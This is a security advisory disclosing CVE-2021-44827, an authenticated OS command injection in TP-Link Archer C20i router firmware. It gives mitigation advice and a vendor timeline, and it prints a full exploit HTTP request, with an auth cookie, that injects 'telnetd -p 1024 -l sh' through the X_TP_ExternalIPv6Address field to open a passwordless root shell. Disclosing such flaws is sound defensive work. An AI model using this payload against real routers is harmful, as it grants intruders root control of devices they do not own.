CVE-2021-44827
Summary
TP-Link router Archer C20i contains authenticated remote code execution vulnerability.
Tech details
TP-Link router Archer C20i
firmware version 0.9.1 3.2 v003a.0 Build 170221 Rel.55462
or older
is vulnerable to authenticated remote code execution by injecting an OS command into the network
interface configuration web request. Admin credentials are required to exploit it.
Vulnerability
The vulnerable parameter is X_TP_ExternalIPv6Address
and an example of an exploit may look like this:
POST /cgi?2&2 HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.0.1/mainFrame.htm Content-Type: text/plain Content-Length: 657 Origin: http://192.168.0.1 Connection: close Cookie: Authorization=Basic YWRtaW46a2o4NzZmc2Q1NjI0ODk= [WAN_ETH_INTF#1,0,0,0,0,0#0,0,0,0,0,0]0,1 X_TP_lastUsedIntf=ipoe_eth3_s [WAN_IP_CONN#1,1,1,0,0,0#0,0,0,0,0,0]1,21 externalIPAddress=192.168.9.222 subnetMask=255.255.255.0 defaultGateway=192.168.9.2 NATEnabled=1 X_TP_FullconeNATEnabled=0 X_TP_FirewallEnabled=1 X_TP_IGMPProxyEnabled=1 X_TP_IGMPForceVersion=0 maxMTUSize=1500 DNSOverrideAllowed=1 DNSServers=192.168.9.3,0.0.0.0 X_TP_IPv4Enabled=1 X_TP_IPv6Enabled=0 X_TP_IPv6AddressingType=Static X_TP_ExternalIPv6Address=&telnetd -p 1024 -l sh& X_TP_PrefixLength=64 X_TP_DefaultIPv6Gateway=:: X_TP_IPv6DNSOverrideAllowed=0 X_TP_IPv6DNSServers=::,:: X_TP_MLDProxyEnabled=0 enable=1
This authenticated web request would start a telnet
server on tcp port 1024 and allow root connection without a password.
Proof-of-concept
A proof of concept python script is available in this repo:
https://github.com/full-disclosure/CVE-2021-44827
Update is available
To mitigate the issue please update to the latest available firmware from TP-Link:
https://www.tp-link.com/en/support/download/archer-c20i/#Firmware
Full Disclosure team recommends using routers that support OpenWRT
.
Timeline
2021-12-08 - initial research 2021-12-09 - CVE-2021-44827 assigned 2021-12-13 - an exploit PoC sent to TP-Link 2021-12-21 - TP-Link confirmed the issue 2022-01-18 - TP-Link releases a fixed firmware and asks to verify 2022-02-17 - TP-Link publishes the fixed firmware 2022-03-02 - full disclosure